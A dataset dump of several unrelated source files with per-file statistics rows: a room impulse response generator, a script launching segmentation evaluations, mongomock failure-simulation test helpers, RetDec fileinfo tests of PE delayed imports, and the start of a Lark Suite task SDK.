>>> cupy.testing.assert_allclose(rirs_np, cupy.asnumpy(rirs_cp), atol=1e-5, rtol=1e-5)
>>> beta = np.random.uniform(0.1, 0.9, size=6)
>>> rirs_np = xp_rirgen(room, source_loc, mic_loc, beta=beta, t60=None)
>>> cbeta = cupy.array(beta)
>>> rirs_cp = xp_rirgen(croom, csource_loc, cmic_loc, beta=cbeta, t60=None)
>>> cupy.testing.assert_allclose(rirs_np, cupy.asnumpy(rirs_cp), atol=1e-5, rtol=1e-5)
"""
# xp = cupy.get_array_module(room, source_loc, mic_loc, beta)
xp
if beta is None and t60 is None:
raise Exception('Either t60 or beta array must be provided')
elif beta is None:
V = xp.prod(room)
S = 2 * (room[0] * room[2] + room[1] * room[2] + room[0] * room[1])
alpha = 24 * V * xp.log(10) / (c * S * t60)
if alpha < 1:
beta = xp.ones(6, ) * xp.sqrt(1 - alpha)
else:
raise Exception('t60 value {} too small for the room'.format(t60))
else:
if xp.max(beta) >= 1.0 or xp.min(beta) <= 0.0:
raise Exception('beta array values should be in the interval (0,1).')
if t60 is not None:
print('Overwriting provided t60 value using provided beta array')
alpha = 1 - beta**2
V = xp.prod(room)
Se = 2 * (room[1] * room[2] * (alpha[0] + alpha[1]) + room[0] * room[2] * (alpha[2] + alpha[3]) + room[0] * room[1] * (alpha[4] + alpha[5]))
t60 = 24 * xp.log(10.0) * V / (c * Se);
if htw is None:
htw = np.minimum(32, int(xp.min(room) / 10 / c * fs))
tw_idx = xp.arange(0, 2 * htw).reshape(2 * htw, 1)
try:
assert(xp.all(room.T - mic_loc.T > 0) and xp.all(room.T - source_loc.T > 0))
assert(xp.all(mic_loc.T > 0) and xp.all(source_loc.T > 0))
except:
raise Exception('Room dimensions and source and mic locations are not compatible.')
cTs = c / fs
# convert distances in meters to time-delays in samples
room = room / cTs
mic_loc = mic_loc / cTs
src_loc = source_loc / cTs
nmic = mic_loc.shape[-1]
nsrc = source_loc.shape[-1]
if nsamples is None:
nsamples = int(fs * t60)
def get_reflection_candidates():
nxrefl = int(nsamples / (room[0]))
nyrefl = int(nsamples / (room[1]))
nzrefl = int(nsamples / (room[2]))
xro = xp.arange(-nxrefl, nxrefl + 1)
yro = xp.arange(-nyrefl, nyrefl + 1)
zro = xp.arange(-nzrefl, nzrefl + 1)
xr = xro.reshape(2 * nxrefl + 1, 1, 1)
yr = yro.reshape(1, 2 * nyrefl + 1, 1)
zr = zro.reshape(1, 1, 2 * nzrefl + 1)
RoughDelays = xp.sqrt((2 * xr * room[0]) ** 2 + (2 * yr * room[1]) ** 2 + (2 * zr * room[2]) ** 2)
RoughGains = (beta[0] * beta[1]) ** xp.abs(xr) * (beta[2] * beta[3]) ** xp.abs(yr) * (beta[4] * beta[5]) ** xp.abs(zr) / (
RoughDelays + 0.5 / c * fs) # assume src-mic distance at least .5 metres
maxgain = xp.max(RoughGains)
vreflidx = xp.vstack(xp.nonzero(xp.logical_and(RoughDelays < nsamples, RoughGains > maxgain / 1.0e4)))
nrefl = vreflidx.shape[-1]
reflidx = xp.arange(nrefl).reshape(1, 1, nrefl, 1, 1, 1)
xrefl = xro[vreflidx[..., reflidx][0]]
yrefl = yro[vreflidx[..., reflidx][1]]
zrefl = zro[vreflidx[..., reflidx][2]]
return xrefl, yrefl, zrefl
xrefl, yrefl, zrefl = get_reflection_candidates()
def get_delays_and_gains():
xside = xp.arange(0, 2).reshape(1, 1, 1, 2, 1, 1)
yside = xp.arange(0, 2).reshape(1, 1, 1, 1, 2, 1)
zside = xp.arange(0, 2).reshape(1, 1, 1, 1, 1, 2)
imic = xp.arange(nmic).reshape(1, nmic, 1, 1, 1, 1)
isrc = xp.arange(nsrc).reshape(nsrc, 1, 1, 1, 1, 1)
Delays = xp.sqrt((2 * xrefl * room[0] - mic_loc[0, imic] + (1 - 2 * xside) * src_loc[0, isrc]) ** 2 + (2 * yrefl * room[1] - mic_loc[1, imic] + (1 - 2 * yside) * src_loc[1, isrc]) ** 2 + (2 * zrefl * room[2] - mic_loc[2, imic] + (1 - 2 * zside) * src_loc[2, isrc]) ** 2)
Refl_x = beta[0] ** (xp.abs(xrefl - xside)) * beta[1] ** (xp.abs(xrefl))
Refl_y = beta[2] ** (xp.abs(yrefl - yside)) * beta[3] ** (xp.abs(yrefl))
Refl_z = beta[4] ** (xp.abs(zrefl - zside)) * beta[5] ** (xp.abs(zrefl))
Gains = Refl_x * Refl_y * Refl_z / (4 * np.pi * Delays * cTs)
# Gains[Delays > nsamples] = 0.0
return Delays, Gains
Delays, Gains = get_delays_and_gains()
rirs = xp.zeros((nsrc, nmic, nsamples), dtype=np.float32)
for src in xp.arange(nsrc):
for mic in xp.arange(nmic):
dnow = Delays[src, mic, ...].flatten()
gnow = Gains[src, mic, ...].flatten()
if method == 1:
gnow = gnow[dnow < nsamples - htw - 2]
dnow = dnow[dnow < nsamples - htw - 2]
dnow_floor = xp.floor(dnow)
dnow_dist = dnow - dnow_floor
dnow_floor = dnow_floor.reshape(1, dnow.shape[0])
dnow_dist = dnow_dist.reshape(1, dnow.shape[0])
gnow = gnow.reshape(1, dnow.shape[0])
dnow_ext = dnow_floor + tw_idx - htw + 1
garg = np.pi * (-dnow_dist + 1 + tw_idx - htw)
gnow_ext = gnow * 0.5 * (1.0 - xp.cos(np.pi + garg / htw)) * xp.where(garg == 0.0, 1.0, xp.sin(garg) / garg)
dnow = dnow_ext.flatten().astype(np.uint32)
gnow = gnow_ext.flatten().astype(np.float32)
rirnow = xp.zeros((nsamples,), dtype=np.float32)
if xp == np:
np.add.at(rirnow, dnow, gnow)
else:
xp.scatter_add(rirnow, dnow, gnow)
rirs[src, mic, ...] = rirnow
elif method == 2: ## this is too slow and may not be accurate as well
gnow = gnow[dnow < nsamples]
dnow = dnow[dnow < nsamples]
frange = xp.arange(0, 0.5 + 0.5 / nsamples, 1.0 / nsamples)
rirfft = xp.zeros(frange.shape, dtype=np.complex128)
for i in range(len(frange)):
rirfft[i] = xp.sum(gnow * xp.exp(-1j * 2 * np.pi * frange[i] * dnow))
rirs[src, mic, :] = xp.real(xp.fft.irfft(rirfft)).astype(dtype=np.float32)
if hpfilt:
rirs[:, :, 1:-1] += -0.5 * rirs[:, :, 2:] -0.5 * rirs[:, : , :-2]
return rirs
| 51.418231 | 329 | 0.53788 | 2,788 | 19,179 | 3.630201 | 0.10868 | 0.010078 | 0.007707 | 0.004743 | 0.957712 | 0.957415 | 0.957415 | 0.948029 | 0.948029 | 0.948029 | 0 | 0.054594 | 0.313311 | 19,179 | 372 | 330 | 51.556452 | 0.713895 | 0.283435 | 0 | 0.870445 | 0 | 0 | 0.040547 | 0 | 0 | 0 | 0 | 0 | 0.016194 | 1 | 0.032389 | false | 0 | 0.008097 | 0 | 0.072874 | 0.008097 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6df0e694953766d35046fcf71b758062d04cd776 | 530 | py | Python | eval_ricord1a_timm-regnetx_002_MedianBlur.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | eval_ricord1a_timm-regnetx_002_MedianBlur.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | eval_ricord1a_timm-regnetx_002_MedianBlur.py | BrunoKrinski/segtool | cb604b5f38104c43a76450136e37c3d1c4b6d275 | [
"MIT"
] | null | null | null | import os
ls=["python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_0_MedianBlur.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_1_MedianBlur.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_2_MedianBlur.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_3_MedianBlur.yml",
"python main.py --configs configs/eval_ricord1a_unetplusplus_timm-regnetx_002_4_MedianBlur.yml",
]
for l in ls:
os.system(l) | 48.181818 | 100 | 0.843396 | 80 | 530 | 5.2125 | 0.3 | 0.119904 | 0.143885 | 0.227818 | 0.892086 | 0.892086 | 0.892086 | 0.892086 | 0.892086 | 0.892086 | 0 | 0.0501 | 0.058491 | 530 | 11 | 101 | 48.181818 | 0.785571 | 0 | 0 | 0 | 0 | 0 | 0.875706 | 0.640301 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
0987c5978494d48b51c857daf561d862cf9863fb | 7,041 | py | Python | tests/test_observers/failing_mongo_mock.py | ahallermed/sacred | 5a25c89aae75192a52dce8772ed0979104627fed | [
"MIT"
] | 3,895 | 2015-03-16T18:52:44.000Z | 2022-03-31T01:43:56.000Z | tests/test_observers/failing_mongo_mock.py | ahallermed/sacred | 5a25c89aae75192a52dce8772ed0979104627fed | [
"MIT"
] | 710 | 2015-03-26T11:45:42.000Z | 2022-03-31T21:51:08.000Z | tests/test_observers/failing_mongo_mock.py | ahallermed/sacred | 5a25c89aae75192a52dce8772ed0979104627fed | [
"MIT"
] | 401 | 2015-03-18T14:34:42.000Z | 2022-03-05T23:26:50.000Z | import mongomock
import pymongo
import pymongo.errors
class FailingMongoClient(mongomock.MongoClient):
def __init__(
self,
max_calls_before_failure=2,
exception_to_raise=pymongo.errors.AutoReconnect,
**kwargs,
):
super().__init__(**kwargs)
self._max_calls_before_failure = max_calls_before_failure
self.exception_to_raise = exception_to_raise
self._exception_to_raise = exception_to_raise
def get_database(
self, name=None, codec_options=None, read_preference=None, write_concern=None
):
if name is None:
return self.get_default_database()
db = self._database_accesses.get(name)
if db is None:
db_store = self._store[name]
db = self._database_accesses[name] = FailingDatabase(
max_calls_before_failure=self._max_calls_before_failure,
exception_to_raise=self._exception_to_raise,
client=self,
name=name,
read_preference=read_preference or self.read_preference,
codec_options=self._codec_options,
_store=db_store,
)
return db
class FailingDatabase(mongomock.Database):
def __init__(self, max_calls_before_failure, exception_to_raise=None, **kwargs):
super().__init__(**kwargs)
self._max_calls_before_failure = max_calls_before_failure
self._exception_to_raise = exception_to_raise
def get_collection(
self,
name,
codec_options=None,
read_preference=None,
write_concern=None,
read_concern=None,
):
try:
return self._collection_accesses[name].with_options(
codec_options=codec_options or self._codec_options,
read_preference=read_preference or self.read_preference,
read_concern=read_concern,
write_concern=write_concern,
)
except KeyError:
self._ensure_valid_collection_name(name)
collection = self._collection_accesses[name] = FailingCollection(
max_calls_before_failure=self._max_calls_before_failure,
exception_to_raise=self._exception_to_raise,
database=self,
name=name,
write_concern=write_concern,
read_preference=read_preference or self.read_preference,
codec_options=codec_options or self._codec_options,
_db_store=self._store,
)
return collection
class FailingCollection(mongomock.Collection):
def __init__(self, max_calls_before_failure, exception_to_raise, **kwargs):
super().__init__(**kwargs)
self._max_calls_before_failure = max_calls_before_failure
self._exception_to_raise = exception_to_raise
self._calls = 0
def insert_one(self, document, session=None):
self._calls += 1
if self._calls > self._max_calls_before_failure:
raise pymongo.errors.ConnectionFailure
else:
return super().insert_one(document)
def update_one(self, filter, update, upsert=False, session=None):
self._calls += 1
if self._calls > self._max_calls_before_failure:
raise pymongo.errors.ConnectionFailure
else:
return super().update_one(filter, update, upsert)
class ReconnectingMongoClient(FailingMongoClient):
def __init__(self, max_calls_before_reconnect, **kwargs):
super().__init__(**kwargs)
self._max_calls_before_reconnect = max_calls_before_reconnect
def get_database(
self, name=None, codec_options=None, read_preference=None, write_concern=None
):
if name is None:
return self.get_default_database()
db = self._database_accesses.get(name)
if db is None:
db_store = self._store[name]
db = self._database_accesses[name] = ReconnectingDatabase(
max_calls_before_reconnect=self._max_calls_before_reconnect,
max_calls_before_failure=self._max_calls_before_failure,
exception_to_raise=self._exception_to_raise,
client=self,
name=name,
read_preference=read_preference or self.read_preference,
codec_options=self._codec_options,
_store=db_store,
)
return db
class ReconnectingDatabase(FailingDatabase):
def __init__(self, max_calls_before_reconnect, **kwargs):
super().__init__(**kwargs)
self._max_calls_before_reconnect = max_calls_before_reconnect
def get_collection(
self,
name,
codec_options=None,
read_preference=None,
write_concern=None,
read_concern=None,
):
try:
return self._collection_accesses[name].with_options(
codec_options=codec_options or self._codec_options,
read_preference=read_preference or self.read_preference,
read_concern=read_concern,
write_concern=write_concern,
)
except KeyError:
self._ensure_valid_collection_name(name)
collection = self._collection_accesses[name] = ReconnectingCollection(
max_calls_before_reconnect=self._max_calls_before_reconnect,
max_calls_before_failure=self._max_calls_before_failure,
exception_to_raise=self._exception_to_raise,
database=self,
name=name,
write_concern=write_concern,
read_preference=read_preference or self.read_preference,
codec_options=codec_options or self._codec_options,
_db_store=self._store,
)
return collection
class ReconnectingCollection(FailingCollection):
def __init__(self, max_calls_before_reconnect, **kwargs):
super().__init__(**kwargs)
self._max_calls_before_reconnect = max_calls_before_reconnect
def insert_one(self, document, session=None):
self._calls += 1
if self._is_in_failure_range():
print(self.name, "insert no connection")
raise self._exception_to_raise
else:
print(self.name, "insert connection reestablished")
return mongomock.Collection.insert_one(self, document)
def update_one(self, filter, update, upsert=False, session=None):
self._calls += 1
if self._is_in_failure_range():
print(self.name, "update no connection")
raise self._exception_to_raise
else:
print(self.name, "update connection reestablished")
return mongomock.Collection.update_one(self, filter, update, upsert)
def _is_in_failure_range(self):
return (
self._max_calls_before_failure
< self._calls
<= self._max_calls_before_reconnect
)
| 36.863874 | 85 | 0.644795 | 762 | 7,041 | 5.486877 | 0.093176 | 0.065056 | 0.113848 | 0.094714 | 0.878737 | 0.847644 | 0.833772 | 0.826118 | 0.826118 | 0.818464 | 0 | 0.001192 | 0.285045 | 7,041 | 190 | 86 | 37.057895 | 0.82936 | 0 | 0 | 0.751515 | 0 | 0 | 0.014487 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.018182 | 0.006061 | 0.224242 | 0.024242 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
09bd03ef0492019dbe018fc1db7fc819e39c3c3a | 14,187 | py | Python | tools/fileinfo/features/pe-delayed-imports/test.py | xbabka01/retdec-regression-tests | 1ac40cca5165740364e6f7fb72b20820eac9bc7c | [
"MIT"
] | null | null | null | tools/fileinfo/features/pe-delayed-imports/test.py | xbabka01/retdec-regression-tests | 1ac40cca5165740364e6f7fb72b20820eac9bc7c | [
"MIT"
] | null | null | null | tools/fileinfo/features/pe-delayed-imports/test.py | xbabka01/retdec-regression-tests | 1ac40cca5165740364e6f7fb72b20820eac9bc7c | [
"MIT"
] | null | null | null | from regression_tests import *
class Test001(Test):
settings=TestSettings(
tool='fileinfo',
args='--verbose --json',
input='dropped.ex'
)
def test_delayed_imports_detection(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['importTable']['numberOfImports'], '80')
self.assertEqual(self.fileinfo.output['importTable']['md5'], '6f94503e98785a3637bc2177cce10427')
self.assertEqual(self.fileinfo.output['importTable']['imports'][69]['index'], '69')
self.assertEqual(self.fileinfo.output['importTable']['imports'][72]['index'], '72')
self.assertEqual(self.fileinfo.output['importTable']['imports'][73]['index'], '73')
self.assertEqual(self.fileinfo.output['importTable']['imports'][74]['index'], '74')
self.assertEqual(self.fileinfo.output['importTable']['imports'][75]['index'], '75')
self.assertEqual(self.fileinfo.output['importTable']['imports'][76]['index'], '76')
self.assertEqual(self.fileinfo.output['importTable']['imports'][77]['index'], '77')
self.assertEqual(self.fileinfo.output['importTable']['imports'][78]['index'], '78')
self.assertEqual(self.fileinfo.output['importTable']['imports'][79]['index'], '79')
assert 'name' not in self.fileinfo.output['importTable']['imports'][69]
self.assertEqual(self.fileinfo.output['importTable']['imports'][72]['name'], 'GetInputState')
self.assertEqual(self.fileinfo.output['importTable']['imports'][73]['name'], 'wsprintfA')
self.assertEqual(self.fileinfo.output['importTable']['imports'][74]['name'], 'PostThreadMessageA')
self.assertEqual(self.fileinfo.output['importTable']['imports'][75]['name'], 'GetMessageA')
self.assertEqual(self.fileinfo.output['importTable']['imports'][76]['name'], 'GetDesktopWindow')
self.assertEqual(self.fileinfo.output['importTable']['imports'][77]['name'], 'RegOpenKeyExA')
self.assertEqual(self.fileinfo.output['importTable']['imports'][78]['name'], 'RegCloseKey')
self.assertEqual(self.fileinfo.output['importTable']['imports'][79]['name'], 'RegQueryValueExA')
self.assertEqual(self.fileinfo.output['importTable']['imports'][69]['libraryName'], 'WS2_32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][72]['libraryName'], 'USER32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][73]['libraryName'], 'USER32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][74]['libraryName'], 'USER32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][75]['libraryName'], 'USER32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][76]['libraryName'], 'USER32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][77]['libraryName'], 'ADVAPI32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][78]['libraryName'], 'ADVAPI32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][79]['libraryName'], 'ADVAPI32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][69]['address'], '0x40911c')
self.assertEqual(self.fileinfo.output['importTable']['imports'][72]['address'], '0x4020ae')
self.assertEqual(self.fileinfo.output['importTable']['imports'][73]['address'], '0x402078')
self.assertEqual(self.fileinfo.output['importTable']['imports'][74]['address'], '0x40209c')
self.assertEqual(self.fileinfo.output['importTable']['imports'][75]['address'], '0x40208a')
self.assertEqual(self.fileinfo.output['importTable']['imports'][76]['address'], '0x402058')
self.assertEqual(self.fileinfo.output['importTable']['imports'][77]['address'], '0x4020f2')
self.assertEqual(self.fileinfo.output['importTable']['imports'][78]['address'], '0x4020c0')
self.assertEqual(self.fileinfo.output['importTable']['imports'][79]['address'], '0x4020e0')
self.assertEqual(self.fileinfo.output['importTable']['imports'][69]['ordinalNumber'], '20')
self.assertEqual(self.fileinfo.output['importTable']['imports'][69]['delayed'], 'false')
self.assertEqual(self.fileinfo.output['importTable']['imports'][72]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][73]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][74]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][75]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][76]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][77]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][78]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][79]['delayed'], 'true')
class Test002(Test):
settings=TestSettings(
tool='fileinfo',
args='--verbose --json',
input='delay_loaded_dlls_by_va_32bit.ex_'
)
def test_delayled_imports_detection(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['importTable']['numberOfImports'], '31')
self.assertEqual(self.fileinfo.output['importTable']['md5'], 'c64d18c2324195b6f30e544ac4d0793a')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['index'], '0')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['libraryName'], 'KERNEL32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['address'], '0x400a00')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['name'], 'GetModuleHandleA')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['ordinalNumber'], '294')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['delayed'], 'false')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['index'], '25')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['libraryName'], 'COMCTL32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['address'], '0x400708')
assert 'name' not in self.fileinfo.output['importTable']['imports'][25]
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['ordinalNumber'], '17')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['index'], '26')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['libraryName'], 'COMCTL32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['address'], '0x4006e8')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['name'], 'InitCommonControlsEx')
assert 'ordinalNumber' not in self.fileinfo.output['importTable']['imports'][26]
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['index'], '27')
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['libraryName'], 'WS2_32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['address'], '0x40075e')
assert 'name' not in self.fileinfo.output['importTable']['imports'][27]
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['ordinalNumber'], '115')
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['delayed'], 'true')
class Test003(Test):
settings=TestSettings(
tool='fileinfo',
args='--verbose --json',
input='delay_loaded_dlls_rva_32bit.ex_'
)
def test_delayed_imports_detection(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['importTable']['numberOfImports'], '31')
self.assertEqual(self.fileinfo.output['importTable']['md5'], '7877a03959578abdcfd18f857518208c')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['index'], '0')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['libraryName'], 'KERNEL32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['address'], '0x400c00')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['name'], 'WaitForSingleObject')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['ordinalNumber'], '1124')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['delayed'], 'false')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['index'], '25')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['libraryName'], 'COMCTL32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['address'], '0x4006ec')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['name'], 'InitCommonControlsEx')
assert 'ordinalNumber' not in self.fileinfo.output['importTable']['imports'][25]
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['index'], '26')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['libraryName'], 'COMCTL32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['address'], '0x4006d1')
assert 'name' not in self.fileinfo.output['importTable']['imports'][26]
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['ordinalNumber'], '17')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['index'], '27')
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['libraryName'], 'WS2_32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['address'], '0x400727')
assert 'name' not in self.fileinfo.output['importTable']['imports'][27]
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['ordinalNumber'], '115')
self.assertEqual(self.fileinfo.output['importTable']['imports'][27]['delayed'], 'true')
class Test004(Test):
settings=TestSettings(
tool='fileinfo',
args='--verbose --json',
input='delay_loaded_dlls_rva_64bit.ex_'
)
def test_delayed_imports_detection(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['importTable']['numberOfImports'], '30')
self.assertEqual(self.fileinfo.output['importTable']['md5'], '68592d0426806874d10b4c28d9c5cd40')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['index'], '0')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['libraryName'], 'KERNEL32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['address'], '0x140001000')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['name'], 'WaitForSingleObject')
self.assertEqual(self.fileinfo.output['importTable']['imports'][0]['ordinalNumber'], '1128')
self.assertEqual(self.fileinfo.output['importTable']['imports'][24]['index'], '24')
self.assertEqual(self.fileinfo.output['importTable']['imports'][24]['libraryName'], 'COMCTL32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][24]['address'], '0x1400009b7')
self.assertEqual(self.fileinfo.output['importTable']['imports'][24]['name'], 'InitCommonControlsEx')
assert 'ordinalNumber' not in self.fileinfo.output['importTable']['imports'][24]
self.assertEqual(self.fileinfo.output['importTable']['imports'][24]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['index'], '25')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['libraryName'], 'COMCTL32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['address'], '0x140000932')
assert 'name' not in self.fileinfo.output['importTable']['imports'][25]
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['ordinalNumber'], '17')
self.assertEqual(self.fileinfo.output['importTable']['imports'][25]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['index'], '26')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['libraryName'], 'WS2_32.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['address'], '0x140000a60')
assert 'name' not in self.fileinfo.output['importTable']['imports'][26]
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['ordinalNumber'], '115')
self.assertEqual(self.fileinfo.output['importTable']['imports'][26]['delayed'], 'true')
class Test005(Test):
settings=TestSettings(
tool='fileinfo',
args='--verbose --json',
input='delayimports.ex'
)
def test_delayed_imports_detection(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['importTable']['numberOfImports'], '4')
self.assertEqual(self.fileinfo.output['importTable']['imports'][3]['address'], '0x401150')
self.assertEqual(self.fileinfo.output['importTable']['imports'][3]['index'], '3')
self.assertEqual(self.fileinfo.output['importTable']['imports'][3]['libraryName'], 'msvcrt.dll')
self.assertEqual(self.fileinfo.output['importTable']['imports'][3]['name'], 'printf')
self.assertEqual(self.fileinfo.output['importTable']['imports'][3]['delayed'], 'true')
self.assertEqual(self.fileinfo.output['importTable']['md5'], '4e7b7b5b63ae609e9707b4896498325d')
| 72.382653 | 108 | 0.677169 | 1,458 | 14,187 | 6.564472 | 0.085048 | 0.171769 | 0.24825 | 0.399958 | 0.911086 | 0.911086 | 0.911086 | 0.900951 | 0.697837 | 0.591579 | 0 | 0.050762 | 0.116868 | 14,187 | 195 | 109 | 72.753846 | 0.713146 | 0 | 0 | 0.398844 | 0 | 0 | 0.319236 | 0.017974 | 0 | 0 | 0.013252 | 0 | 0.791908 | 1 | 0.028902 | false | 0 | 0.803468 | 0 | 0.890173 | 0.011561 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
febc84757651008c199cf7e05bb71468e9649aae | 32,827 | py | Python | src/larksuiteoapi/service/task/v1/api.py | VXenomac/oapi-sdk-python | 156b789b3d20653802f64842c9a26229dd9252d7 | [
"Apache-2.0"
] | 50 | 2021-04-11T05:24:10.000Z | 2022-03-29T10:14:13.000Z | src/larksuiteoapi/service/task/v1/api.py | larksuite/oapi-sdk-python | 70fda5b1ccf765938bf207dff0117c0c03a93605 | [
"Apache-2.0"
] | 20 | 2021-04-07T15:17:44.000Z | 2022-03-23T06:27:12.000Z | src/larksuiteoapi/service/task/v1/api.py | VXenomac/oapi-sdk-python | 156b789b3d20653802f64842c9a26229dd9252d7 | [
"Apache-2.0"
] | 8 | 2021-04-25T15:02:17.000Z | 2022-03-13T15:00:59.000Z | # -*- coding: UTF-8 -*-
# Code generated by lark suite oapi sdk gen
from typing import *
from ....api import Request as APIRequest, Response as APIResponse, set_timeout, set_tenant_key, set_user_access_token, set_path_params, \
set_query_params, set_response_stream, set_is_response_stream, FormData, FormDataFile
from ....config import Config
from ....consts import ACCESS_TOKEN_TYPE_TENANT, ACCESS_TOKEN_TYPE_USER, ACCESS_TOKEN_TYPE_APP
from .model import *
class Service(object):
def __init__(self, conf):
# type: (Config) -> None
self.conf = conf
self.tasks = TaskService(self)
self.task_comments = TaskCommentService(self)
self.task_collaborators = TaskCollaboratorService(self)
self.task_followers = TaskFollowerService(self)
self.task_reminders = TaskReminderService(self)
class TaskService(object):
def __init__(self, service):
# type: (Service) -> None
self.service = service
def complete(self, tenant_key=None, timeout=None):
# type: (str, int) -> TaskCompleteReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
